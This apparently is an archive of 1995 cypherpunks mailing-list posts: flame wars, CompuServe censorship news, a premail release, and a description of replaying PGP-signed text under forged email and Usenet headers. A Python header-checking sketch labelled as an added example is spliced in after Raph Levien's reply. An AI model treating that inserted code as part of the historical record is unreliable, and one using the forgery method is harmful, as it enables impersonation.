To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE
Message-ID: <199512271950.OAA04721@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[ Non-crypto garbage deleted ]

The Vince Foster articles were more relevant than this
garbage (not to mention the fact they made more sense).


P.S.  This post is in the public domain.

          G. E. T. A. F. U. C. K. I. N. G. C. L. U. E.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOGjoCoZzwIn1bdtAQHRJwF/fATfL+ZmsLlB8wgGdme5QkXExqw8Fa0G
MZuaH93wUT5B+VgTQSuWPfqfd+zaUUTo
=jf8w
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Thu, 28 Dec 1995 20:46:11 +0800
To: cypherpunks@toad.com
Subject: DOS - MD5 - Thanks
Message-ID: <Pine.3.89.9512271424.D29727-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to everyone who offered help on the MD5 for DOS.
Greg Broiles pointed me to the pgp source, which may do the
trick. (There is an MD5 module in pgp[?]) I will investigate.

For everyone's info, didn't find a freestanding dos 
implementation, tho.  My copy of Schneier didn't have the
disk, so I don't know if it's there, either.
--
PJP







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Thu, 28 Dec 1995 20:45:50 +0800
To: cypherpunks@toad.com
Subject: Crypto specialist wanted
Message-ID: <Pine.3.89.9512271512.A2054-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


CSI's most recent _Computer Security Alert_ has a listing for:
Cryptographic specialist for a San Diego based firm.  Headhunter's
address is: vfalcon@onramp.net

(I know this isn't jobs.misc, but traffic having been relatively
light, I'm passing this on to others who may be interested in
crypto, but aren't on CSI's mailing list.  Now back to frequency
hopping radios and Anti-Fred)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 28 Dec 1995 17:54:28 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE
Message-ID: <199512272034.PAA04934@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[ More non-crypto garbage deleted ]

> > God, you are annoying Fred, ER, I meant, "Alice".

> My dearest Perry.

> I am not Fred.  I am not he.  He is not me. Got it??  We aren't even in
> the same category or the same country.  Fred's an American, and I am not.

But you do have much in common.  Perry did not say that you are Fred,
but instead implied he mixed the two of you up (quite understandable).

> Scary, isn't it??  A non-American ...

What's scary is a non-American foaming at the mouth about American
politics when I'm sure his own country is far from perfect.


P.S.  This post is in the public domain.

          G. E. T. A. F. U. C. K. I. N. G. C. L. U. E.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOGt6yoZzwIn1bdtAQHvtwGAyZvsHKR64N1cPI6R95HiyMfuSuATVQNP
BeXflQ0LGAhRHeXH9V8TUO79RBTe0y80
=m+al
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Dec 1995 21:39:32 +0800
To: cypherpunks@toad.com
Subject: Re: another anonymous poster helping to destroy our rights
Message-ID: <ad0710d0020210049d6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:25 PM 12/27/95, Jeff Barber wrote:
>Fred Cohen writes:
>>
>> We just heard from another anonymous poster trying to destroy our rights
>> to free speech.  How long will the cypherpunks put up with this?
>
>As Tim May has explained over and over again, "the cypherpunks" do not
>exist.  Cypherpunks is a mailing list, not a society or club.
>"The cypherpunks" as a group can do nothing about what gets posted to
>this list except comment on it.

Precisely.

Some of the many advantages of having no centralized structure/leadership,
and no formal rules/policies, are:

-- less wrangling over leadership and rules (if you think we wrangle and
fight too much, look at organizations that spend *all* of their time
choosing leaders, having boardroom fights, setting policies, fighting,
electioneering, etc...it makes our easily-filtered flame wars pale by
comparison)

-- no leaders means no one in a position of leadership to sue for the many
"infractions" some of our list members commit (violations of export laws,
posting of stolen code, libel, etc., all allegedly, of course)

-- no centralized focus, save for the toad.com machine, which could be
replaced quickly (or cypherpunks could become "alt.cypherpunks" and then
truly have no center, not that I am advocating this, for various reasons).
This lack of a point of pressure, a center, means opponents have nothing to
jab at...they can't write threatening letters to the "Board of Directors"
demanding that certain actions cease, etc.

>Finally, it should be noted that the kind of messages you're posting
>lately are eerily reminiscent of Detweiler's mental deterioration just
>before he went off the deep end.  In fact, the line "How long will the
>cypherpunks put up with this?" may be an exact quote.

Indeed. When I saw this "How long will the Cypherpunks put up with this?" I
initially thought it was tongue in cheek. Apparently not.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 28 Dec 1995 18:45:08 +0800
To: die@die.com
Subject: Re: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt]
In-Reply-To: <9512270551.AA23874@pig.die.com>
Message-ID: <Pine.SV4.3.91.951227172231.18209H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> 	That is not what Mr Shannon says,  Shannon's law relates date

   That's Dr Shannon to you, kid.....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Thu, 28 Dec 1995 20:43:23 +0800
To: cypherpunks@toad.com
Subject: Did anyone see...
Message-ID: <v03004201ad07a28dbc90@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


On C-Span today:

2:06 pm ET/11:06 am PT
Secret Codes Used in World War II
National Security Agency


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 28 Dec 1995 19:42:53 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <199512272022.MAA25782@netcom17.netcom.com>
Message-ID: <199512272229.RAA02161@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Not-Detweiler writes:

> >As Tim May has explained over and over again, "the cypherpunks" do not
> >exist.  Cypherpunks is a mailing list, not a society or club.
> >"The cypherpunks" as a group can do nothing about what gets posted to
> >this list except comment on it.
> 
> there are various myths here that ought to be addressed. 
> 
> - if the cypherpunks are not really a group, then people wouldn't get
> upset what goes under the cypherpunk name. but in fact people flame
> hotly what others think is or is not a "legitimate" cypherpunk tactic
> or project or whatever.

And flame hotly is the full extent of what can be done by "the cypherpunks".

The point I'm making is that "the cypherpunks" can't do anything about
anonymous posters or other such "problems".  It's pretty pointless to
ask the list how long "we" will "put up with" postings made by an anonymous
person.  There's nothing I nor any other J. Random Cypherpunk can do about
it, even if I/we wanted to (which I, at least, do not).  This is not at
all the same issue as whether a given post is on-topic or whether a
given opinion is cypherpunk-correct (not that there's much I can do
about those things either).

In any case, the only time most folks on this list get "upset" is
when someone on the list tries to say or imply that they represent
"the cypherpunks" or "the cypherpunk point of view".  Of course he/she
is free to do so anyway, but should expect to get "flamed hotly" if
someone disagrees.

[ Rest of rant also beside the point ]


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@tssun5.dsccc.com
Date: Fri, 29 Dec 1995 15:08:39 +0800
To: Livingood/WSC@hks.net
Subject: Re: Employer Probing Precedents?
Message-ID: <9512272350.AA27768@tssun5.>
MIME-Version: 1.0
Content-Type: text/plain



> From owner-cypherpunks@toad.com Wed Dec 27 17:48 CST 1995
> Date: Wed, 27 Dec 1995 16:51:41 -0500
> Subject: Employer Probing Precedents?
> To: cypherpunks@toad.com
> From: "Jason D. Livingood/WSC"@hks.net
> X-Server-Version: Cactus-Serv 1.5
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To Whom It May Concern:
> 
> I was curious as to where I might find some electronic freedom legal 
> precedents.  If, for example, an employer was planning to probe file systems on 
> PCs in the off-hours and employees began encrypting their hard drives, what 
> legal precedents would support the employees or would support the employer in 
> blocking the encryption?

Try www.eff.org.

I have a partition on my HD that is routinely encrypted.  When asked about it,
my response was that I was acting to protect company confidential material
and company assets.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@tssun5.dsccc.com
Date: Fri, 29 Dec 1995 15:50:17 +0800
To: cypherpunks@toad.com
Subject: Re: Employer Probing Precedents?
Message-ID: <9512272351.AA27795@tssun5.>
MIME-Version: 1.0
Content-Type: text/plain



> From owner-cypherpunks@toad.com Wed Dec 27 17:48 CST 1995
> Date: Wed, 27 Dec 1995 16:51:41 -0500
> Subject: Employer Probing Precedents?
> To: cypherpunks@toad.com
> From: "Jason D. Livingood/WSC"@hks.net
> X-Server-Version: Cactus-Serv 1.5
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To Whom It May Concern:
> 
> I was curious as to where I might find some electronic freedom legal 
> precedents.  If, for example, an employer was planning to probe file systems on 
> PCs in the off-hours and employees began encrypting their hard drives, what 
> legal precedents would support the employees or would support the employer in 
> blocking the encryption?

Try www.eff.org.

I have a partition on my HD that is routinely encrypted.  When asked about it,
my response was that I was acting to protect company confidential material
and company assets.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@kiwi.cs.berkeley.edu>
Date: Thu, 28 Dec 1995 21:02:46 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <qJoRgD2w165w@bwalk.dm.com>
Message-ID: <199512280151.RAA25092@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Dimitri Vulis wrote:
> I suggest to the kind folks working on PGP 3 that there should be a
> standard protocol to include within the signed portion the information
> on when and for whom this text is written: i.e. the list of e-mail
> recipients and/or Usenet newsgroups, which could be easily compared
> with the RFC 822/1036 headers of an e-mail/Usenet article. Perhaps
> there could be a new option for PGP to look _outside_ the signed block
> and match the headers with what's inside the block. E.g., suppose the
> signature block says: this text was written by alice@zog.org, posted
> to alt.sex and alt.sex.banal and e-mailed to bob@masons.com. Suppose
> PGP is asked to check the signature in a file that purports to be an
> e-mail or a Usenet article and has some headers before the signed
> portion. If there is a list of To: recipients, and it includes someone
> other than the recipients listed within the signed block; or if there
> is a Newsgroups: header, and it includes newsgroups not listed within
> the signed portion; then the input is bogus. For compatibility with
> the existing software, if the signed block doesn't include this info,
> then this checking shouldn't be done, of course.

In fact, the security multiparts standard (RFC 1848) includes a
provision for signing the headers as well as the body of a message.
The security multiparts can be used with PGP, and there is even an
Internet Draft for it (draft-elkins-pem-pgp-02.txt), but there is not
yet consensus for adopting this as a standard on the pgp-mime mailing
list. Perhaps your example can be used to argue one of the advantages of
the security multiparts approach.

Raph
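
Added example, not part of the original messages and not PGP or RFC 1848 code: a sketch of the check proposed in the quoted text, comparing recipients and newsgroups declared inside a clear-signed block with the headers outside it. The field names Signed-To and Signed-Newsgroups are hypothetical, treating Cc like To is an assumption, the sample messages are constructed, and verifying the signature itself is assumed to happen separately.

```python
import re
from email import message_from_string
from email.utils import getaddresses

# Hypothetical in-body field names; the proposal describes the idea, not a syntax.
SIGNED_TO = "signed-to"
SIGNED_GROUPS = "signed-newsgroups"

_CLEARSIGNED = re.compile(
    r"^-----BEGIN PGP SIGNED MESSAGE-----\n(?:Hash: [^\n]*\n)*\n"
    r"(.*?)\n-----BEGIN PGP SIGNATURE-----$",
    re.S | re.M,
)


def signed_text(body):
    """Return the clear-signed text with dash-escaping undone, or None if unsigned."""
    m = _CLEARSIGNED.search(body.replace("\r\n", "\n"))
    if m is None:
        return None
    lines = m.group(1).split("\n")
    return "\n".join(l[2:] if l.startswith("- ") else l for l in lines)


def declared_scope(text):
    """Parse the leading Signed-To / Signed-Newsgroups lines of the signed text."""
    scope = {}
    for line in text.split("\n"):
        name, sep, value = line.partition(":")
        key = name.strip().lower()
        if not sep or key not in (SIGNED_TO, SIGNED_GROUPS):
            break  # declarations end at the first other line
        items = {v.strip().lower() for v in value.split(",") if v.strip()}
        scope.setdefault(key, set()).update(items)
    return scope


def check_envelope(raw):
    """Return (status, problems); status is match, mismatch, unchecked or unsigned."""
    msg = message_from_string(raw)
    if msg.is_multipart():
        return ("unsigned", [])
    text = signed_text(msg.get_payload())
    if text is None:
        return ("unsigned", [])
    scope = declared_scope(text)
    if not scope:
        # Older signed messages carry no declaration: skip the check.
        return ("unchecked", [])
    outer_rcpts = {
        addr.lower()
        for _, addr in getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))
        if addr
    }
    outer_groups = {
        g.strip().lower()
        for header in msg.get_all("Newsgroups", [])
        for g in header.split(",")
        if g.strip()
    }
    problems = [
        "recipient outside signed scope: " + r
        for r in sorted(outer_rcpts - scope.get(SIGNED_TO, set()))
    ] + [
        "newsgroup outside signed scope: " + g
        for g in sorted(outer_groups - scope.get(SIGNED_GROUPS, set()))
    ]
    return ("mismatch", problems) if problems else ("match", [])


# Constructed sample messages; the signature block is a placeholder.
_SIG = (
    "-----BEGIN PGP SIGNATURE-----\n"
    "(constructed placeholder, not a real signature)\n"
    "-----END PGP SIGNATURE-----\n"
)
_BODY = (
    "-----BEGIN PGP SIGNED MESSAGE-----\n\n"
    "Signed-To: bob@masons.com\n"
    "Signed-Newsgroups: comp.security.misc\n\n"
    "Meet at noon.\n" + _SIG
)
_OLD_BODY = "-----BEGIN PGP SIGNED MESSAGE-----\n\nMeet at noon.\n" + _SIG

GENUINE = "From: alice@zog.org\nTo: Bob <bob@masons.com>\n\n" + _BODY
REDIRECTED = "From: alice@zog.org\nTo: carol@example.org\n\n" + _BODY
REPOSTED = "From: alice@zog.org\nNewsgroups: comp.security.misc, alt.test\n\n" + _BODY
LEGACY = "From: alice@zog.org\nTo: carol@example.org\n\n" + _OLD_BODY

if __name__ == "__main__":
    for name in ("GENUINE", "REDIRECTED", "REPOSTED", "LEGACY"):
        print(name, check_envelope(globals()[name]))
```

The check is only meaningful after the signature over the block has verified, since the declaration lines are trusted solely because they sit inside the signed text.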




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Thu, 28 Dec 1995 21:29:50 +0800
To: John Pettitt <cypherpunks@toad.com
Subject: German government orders censorship of CompuServe -- a   sign of things to come djf
Message-ID: <2.2.32.19951227235302.006bfe14@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Posted-Date: Wed, 27 Dec 1995 17:47:17 -0500
X-Sender: farber@linc.cis.upenn.edu
Date: Wed, 27 Dec 1995 17:47:17 -0500
From: Dave Farber <farber@central.cis.upenn.edu>
Subject: IP: German government orders censorship of CompuServe -- a
  sign of things to come djf
To: 


FOR IMMEDIATE RELEASE


CONTACT:  William Giles                 Russ Robinson
CompuServe Incorporated              CompuServe Incorporated
           614/ 538-4388                        614/ 538-4274



COMPUSERVE(R) SUSPENDS ACCESS TO SPECIFIC INTERNET NEWSGROUPS

COLUMBUS, Ohio, Dec. 28, 1995 -- During the past week, CompuServe Incorporated
temporarily suspended access to more than 200 Internet newsgroups in response to
a direct mandate from the prosecutor's office in Germany.  Each of the
newsgroups that was suspended was specifically identified to CompuServe by the
German authorities as illegal under German criminal law.  CompuServe did not
select any groups or determine the nature of the newsgroups that have been
impacted by this action.  
        German government officials, as part of an investigation of illegal
material on the Internet, ordered CompuServe to do what was necessary with
respect to specified newsgroups in order to comply with German law.  German
authorities are investigating newsgroups and other Internet content that may
contain child pornography, other pornographic material illegal for adults, as
well as content that although not illegal for adults is of such an explicit
nature that it is illegal for minors.  
        While access has been suspended, CompuServe continues to work with
German authorities to resolve this matter.  CompuServe cannot alter the content
on the Internet in any way and has only suspended access to the disputed
newsgroups through CIS.  The issues being investigated in Germany, like those
being addressed across the industry, need to remain focused on the individuals
and groups placing content on the Internet.  CompuServe, as an access provider,
is not responsible for the origination or nature of content on the Internet over
which it has no creative or editorial control.

        The global market is vital to CompuServe.  We currently have 500,000
members in Western Europe and anticipate doubling that number in the next year.
As the leading global service, CompuServe must comply with the laws of the many
countries in which we operate.  
However, laws in different countries are often in conflict, and this creates new
challenges unique to the emerging online industry.  CompuServe is investigating
ways in which we can restrict user access to selected newsgroups by geographical
location.  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 28 Dec 1995 21:29:25 +0800
To: cypherpunks@toad.com
Subject: URL for cypherpunks
Message-ID: <ad07a8b7010210043d01@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I am putting up some solutions to the Garage Door problem that was
discussed here perhaps a year ago. I would like to refer to the cypherpunks
by URL. Are there currently any appropriate URLs ?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 28 Dec 1995 23:06:23 +0800
To: futplex@pseudonym.com
Subject: Re: Telcom bill report
Message-ID: <01HZBAWIUN7C8Y55DD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"futplex@pseudonym.com" 21-DEC-1995 18:57:06.16

>> 	Here's the additional info from Reuters. As usual, Clinton is being a
> coward. 

How do you figure ?

>    Vice President Gore says President Clinton will sign the bill. Before
>    the agreement, the president had been threatening for months to veto
>    the bill if Republicans in Congress did not retreat on a long list of
                 ~~~~~~~~~~~
>    issues. They retreated.
             ~~~~~~~~~~~~~~

Clinton won on this. The Administration does not appear to have altered its
position on this substantially.
----------
	I am calling Clinton a coward for giving in to the Christian Coalition
and not vetoing this bill due to the censorship portion. He evidently decided
that following his oath of office and upholding the First Amendment wasn't
worth the "porn supporter" criticism Ralph Reed and his lot would direct his
way.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 28 Dec 1995 22:18:23 +0800
To: cypherpunks@toad.com
Subject: Announcing a new alpha release of premail
Message-ID: <199512280524.VAA09252@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


   This is to announce that premail version 0.42 is now available. It
is a full alpha version of the new premail, containing all the
features and functions planned for the production release.

   Features include:

* Support for all cypherpunk remailers.

* Support for Mixmaster remailers.

* Encrypted and signed email, including both preparation and decoding.

* Support for the emerging PGP/MIME standard.

* Support for MOSS through TIS/MOSS 7.1.

* Creation and management of alpha.c2.org style nyms.

* More secure handling of sensitive "secrets".

* Much improved automatic selection of remailer chains.

* Clean handling of "cc:" field and other such interactions.

* Numerous other features.

   For more information about premail, see the premail Web page at:

      http://www.c2.org/~raph/premail.html

   If you are in the US or Canada, you can download premail now, from
the premail Distribution Authorization Form:

      http://kiwi.cs.berkeley.edu/premail-form.html

   Please forward bug reports, comments, and suggestions to me, so
that the beta release can be as solid as possible.

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 28 Dec 1995 16:50:35 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE
Message-ID: <199512272040.VAA17079@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



[ More non-crypto garbage deleted ]

> > God, you are annoying Fred, ER, I meant, "Alice".

> My dearest Perry.

> I am not Fred.  I am not he.  He is not me. Got it??  We aren't even in
> the same category or the same country.  Fred's an American, and I am not.

But you do have much in common.  Perry did not say that you are Fred,
but instead implied he mixed the two of you up (quite understandable).

> Scary, isn't it??  A non-American ...

What's scary is a non-American foaming at the mouth about American
politics when I'm sure his own country is far from perfect.


P.S.  This post is in the public domain.

          G. E. T. A. F. U. C. K. I. N. G. C. L. U. E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 28 Dec 1995 21:36:28 +0800
To: cypherpunks@toad.com
Subject: Only accepting e-mail from known parties
Message-ID: <199512280241.VAA19432@pipe10.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


[Below is the original I failed to post to the group as a whole. Sorry
about the temporal confusion that produced.] 
 
On Dec 25, 1995 14:53:19, 'Adam Shostack <adam@lighthouse.homeport.org>'
wrote: 
 
 
>	The basic problem is that (personal) spam is a social, not a 
>technical problem.  If someone wants to annoy you via the internet, 
>they can do so.  You can raise the cost of their annoying you, but you 
>need to be careful not to make it difficult to talk to you. 
> 
 
I agree in many ways. On a personal level, I am far more interested in the
*social* area of this form of privacy. It is more a problem of the
data-hermit than privacy. And in a society increasingly generating
narcissists, I see the problem getting worse. 
 
Negroponte of the MIT Media Lab can sing the praises of the personal
e-newspaper with personal filters to cut out everything uninteresting while
culling the world news feeds for desired information. 
 
I see this feeding into the narcissism problem. E.G. 
 
Imagine two people who "feel" that members of the other gender are "only
interested in one thing." 
 
Each wakes up in the morning and looks at their personal e-paper. 
 
She reads nothing of particularly nasty rapes, serial rapists at large,
rapists who have been convicted, and rapists who an uncaring pro-male
system has let out to rape again (i.e. been found not guilty). 
 
He reads nothing of particularly nasty robberies of men by women, serial
robberies by prostitutes, female robbers who have been convicted, and
robbers who an uncaring pro-female system has let out to rob again. 
 
Both believe that their custom filtered feeds are the *real* events going
on in the world and are far more accurate than any non-customized news
feed. 
 
I hope nobody takes this as a generic attack on the privacy issues that the
list is devoted to. I am a great supporter of privacy and pro-privacy tek.
But I see myself as a realist on privacy issues, not as a privacy-utopian
or a privacy-dystopian. 
 
We live in a post-Faustian world. 
 
It is divided into two groups of people. First are those who understand the
post-Faustian character and devote themselves to getting used to it and
even having fun with the new opportunities while understanding that the new
world also generates new problems (like furthering data-narcissism). Second
are those classic-reactionary forces (from all parts of the political
spectrum) who whine about how the post-Faustian world is personally unfair
to them and how everybody in the world has a personal obligation to them to
move the world back to its pre-Faustian origins. 
 
--tallpaul 
 
PS to Tim May: I understand your posts on material that is off-topic. I
usually agree with your posts. But I see the issues I discussed above as
far more on topic (even if highly mediated) than, say, the ongoing
discourse on the differences between an Army Captain and a Navy Captain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Thu, 28 Dec 1995 22:43:28 +0800
To: vznuri@netcom.com
Subject: Re: another anonymous poster helping to destroy our rights
Message-ID: <9512280551.AA13342@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Vladimir Z. Nuri" 

you can't have it both ways. either anyone is free to decide what a 
cypherpunk is, and no one has the right to argue with it. or, cypherpunks
are something in particular, and someone has the authority to  determine
that.
............................................

So are you saying that "SHTBD!!!!"?  :>)

As you note, it is an informal system which operates on the list.  As you also 
note, an  "intelligent and mischievous adversary" can effectively create 
problems.  But you failed to note that intelligent and technically savvy 
members will find effective ways to deal with it.

That is what is important about an 'anarchic' list like this - that the 
challenge of maintaining rational discourse is met by the application of active 
intelligence, rather than all the rigmarole you mentioned.  And this is what 
makes it interesting, I think.  Any person's ideas or concepts or contributions 
can be tested or challenged by the more knowledgeable on the list, if they are 
so moved (or not, if they are not so moved).

The organizing subject around which discussions revolve is crypto, within the 
social context.  Because of this, the relationship to the main subject is 
difficult to maintain.  (And isn't this list like a microcosm, at times, of the 
larger social picture?) 

It is the unexpurgated exchanges of thought & expression, which regulate the 
list.
It reminds me of a book about life:   You Learn, or You Die. <g>

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 29 Dec 1995 16:14:52 +0800
Subject: A weakness in PGP signatures, and a suggested solution (long)
Message-ID: <oTTsgD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been engaged in a lively debate with a few members of the cypherpunks
mailing list about forgeries that are hard to repudiate even if PGP signatures
are used. One of the participants suggested that I post a summary to
alt.privacy.pgp and sci.crypt, which is just what I'm doing.

(My apologies to the mail.cypherpunks readers who already saw much of
this once.)

I'll illustrate the problem with several scenarios of forgeries.
(It's funny that earlier today I was showing a friend how easy it is to
post forgeries. She seemed suitably impressed. :)

Scenario 1:

Bob once sent Carol an e-mail that looked like this:

-----------------------------------------------------------------------
From: Bob@boxb
To: Carol@boxc
Date: 25 Dec 1965
Subject: Carol, we're history
Message-ID: <111@boxb>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

-----------------------------------------------------------------------

Carol can forge an e-mail to Alice that looks like this:

-----------------------------------------------------------------------
From: Bob@boxb
To: Alice@boxa
Date: 25 Dec 1995
Subject: Alice, we're history
Message-ID: <222@bobb>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

-----------------------------------------------------------------------

We assume that it's easy for Carol to forge the RFC 822 headers to make it look
like the e-mail came from Bob. That's why many of us use digital signatures.

The signed portion of Bob's original e-mail did not state that the message is
addressed to Carol (e.g., "Dear Carol"). Alice will probably verify that the
signature matches Bob's private key and assume that the e-mail is authentic and
has been sent to her by Bob. To repudiate the e-mail, Bob might have to point
out that the "Received:" headers differ from his usual e-mails, without relying
on PGP. In fact, the presence of his verifiable signature would create more of
a presumption of authenticity on Alice's part.

Scenario 2:

Bob sends the same e-mail as above to Carol. David, a rogue sysadmin, gets
a copy of the e-mail, forges the same e-mail as above to Alice.

Scenario 3:

Bob sends a signed e-mail to Alice. Alice sees it in her newsfeed, forges a
Usenet article, makes it look like it came from Bob, and includes the body of
Bob's e-mail as the body of the Usenet forgery. Usenet forgeries are easy.

Again, if the signed text happens to be suitable, then Bob will have difficulty
repudiating the forgery. He won't be able to use the PGP signature, which
will in fact verify. Hopefully, he'll be able to point out that the RFC 1036
Path: header is different from his usual header (which may not be the case).
Many Usenet readers would be unconvinced and Bob's reputation would be damaged.

Scenario 4:

Bob posts a signed Usenet article to alt.sex. Alice forges a usenet article in
Bob's name to misc.kids, recycling the signed body, which would probably be
considered inappropriate for misc.kids. Same result as #3.

Scenario 5:

Bob posts a signed Usenet article to some innocuous newsgroup. Alice reposts
the same body in a forgery in Bob's name. The forgery can be cross-posted to
numerous "inappropriate" newsgroups ("velveeta"), or multi-posted ("spam").
Certain rogue self-appointed net.cops forge cancels for all copies of Bob's
article, including the original. (They are a bigger menace than the forgers :)

(As several people know, I have been a victim of some of the above-described
kinds of forgeries.)

I think the underlying problem is that the way PGP signatures are used by most
people, they validate a text, but allow it to be quoted out of context in an
e-mail or Usenet forgery.

I suggest to the kind folks working on PGP 3 that there should be a standard
protocol to include within the signed portion the information on when and for
whom this text is written: i.e. the list of e-mail recipients and/or Usenet
newsgroups, which could be easily compared with the RFC 822/1036 headers of an
e-mail/Usenet article. Perhaps there could be a new option for PGP to look
_outside_ the signed block and match the headers with what's inside the block.
For example, suppose the signature block says: this text was written by
alice@zog.org, posted to alt.sex and alt.sex.banal and e-mailed to
bob@masons.com. Suppose PGP is asked to check the signature in a file that
purports to be an e-mail or a Usenet article and has some headers before the
signed portion. If there is a list of To: recipients, and it includes someone
other than the recipients listed within the signed block; or if there is a
Newsgroups: header, and it includes newsgroups not listed within the signed
portion; then the input is bogus. For compatibility with the existing software,
if the signed block doesn't include this info, then this checking shouldn't be
done, of course.

After I posted the above suggestion to cypherpunks, one very respected member
of that list informed me that "the security multiparts standard (RFC 1848)
includes a provision for signing the headers as well as the body of a message.
The security multiparts can be used with PGP, and there is even an Internet
Draft for it (draft-elkins-pem-pgp-02.txt), but there is not yet consensus for
adopting this as a standard on the pgp-mime mailing list."

I hope my examples will convince some that present practice of signing pieces
of text which can be quoted out of context in a forgery is just not enough.

We need to have an easy way to sign the headers without resorting to mine.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 3 Jan 1996 21:09:58 +0800
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: A weakness in PGP signatures, and a suggested solution (long)
Message-ID: <199601030407.UAA12551@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been engaged in a lively debate with a few members of the cypherpunks
mailing list about forgeries that are hard to repudiate even if PGP signatures
are used. One of the participants suggested that I post a summary to
alt.privacy.pgp and sci.crypt, which is just what I'm doing.

(My apologies to the mail.cypherpunks readers who already saw much of
this once.)
